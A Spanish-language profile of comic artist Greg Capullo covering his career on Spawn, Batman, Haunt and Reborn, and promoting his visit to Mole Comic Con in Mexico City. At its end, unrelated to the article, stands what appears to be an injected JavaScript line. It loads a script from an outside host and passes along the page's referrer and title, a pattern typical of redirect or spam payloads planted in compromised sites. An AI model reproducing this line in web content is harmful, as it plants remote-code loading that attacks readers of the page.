Greg Capullo, el dibujante de tus pesadillas

 

 

Experiencia dibujando a Batman y a Spawn Si tus pesadillas tuvieran un dibujante, seguramente sería Greg Capullo @GregCapullo

Legendario dibujante de Batman, Spawn y cocreador del nuevo éxito Reborn, comenzó su carrera con la miniserie independienteGore Shriek en 1986, publicada por Fantaco Enterprises. Esto llamó la atención de Marvel Comics @Marvel, que comenzó a encargarle dibujos para series muy importantes como What If…? The Impossible Man Summer Vacation Spectacular, Marvel Super-Heroes, DaredevilAvengers Spotlight, y Fantastic Four Annual.

What_If_Vol_2

De 1991 a 1992, Capullo fue el dibujante titular de Quasar, hasta que la naciente editorial Image @ImageComics le permitió convertirse en el artista suplente de X-Force. Esto a su vez hizo que Todd McFarlane lo invitara a trabajar con él en Spawn, título del cual dibujó tres números, antes de realizar el arte de la miniserie de Angela, escrita por Neil Gaiman.

Con la aparición de Spawn #26, Capullo se convirtió en el nuevo dibujante regular del cómic, con Todd McFarlane como su entintador, con quien se repartiría la responsabilidad de las portadas. Durante los siguientes diez años Capullo se encargó de dibujar la mayoría de la serie, con esporádicas colaboraciones de su creador.

Otros proyectos en que Capullo colaboró durante su estancia en Spawn fueron The Creech, serie creada por él mismo, la cual tuvo dos miniseries de tres números en 1997 y 1998, y Case Files: Sam and Twitch, para la que ilustró un par de historias secundarias aparecidas como back-ups.

En 2009 se convirtió en el artista de layouts de Haunt, una nueva serie de McFarlane Productions y, tras un puñado de números, comenzó a realizar todo el trazo para dicha historieta.

Finalmente, en 2011 se le anunció como el nuevo dibujante de Batman para el relanzamiento del Universo DC, serie en la que compartió créditos con Scott Snyder a lo largo de cinco años, antes de unir su talento al del escritor Mark Millar en el cómic Reborn, de actual publicación bajo el sello Image.

Además de crear arte para World of Warcraft, Greg Capullo se encargó del diseño de los personajes principales de la premiada serie animada Spawn, y ha ilustrado portadas de discos para bandas como Five Finger Death Punch, Korn y Disturbed.

Este maestro del dibujo vendrá a México como uno de los invitados de la próxima Mole Comic Con @lamolecomiccon que se celebrará los días 17, 18, y 19 de marzo en el WTC, una buena oportunidad para conocer y porque no, que te firme algo este maestro del dibujo.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)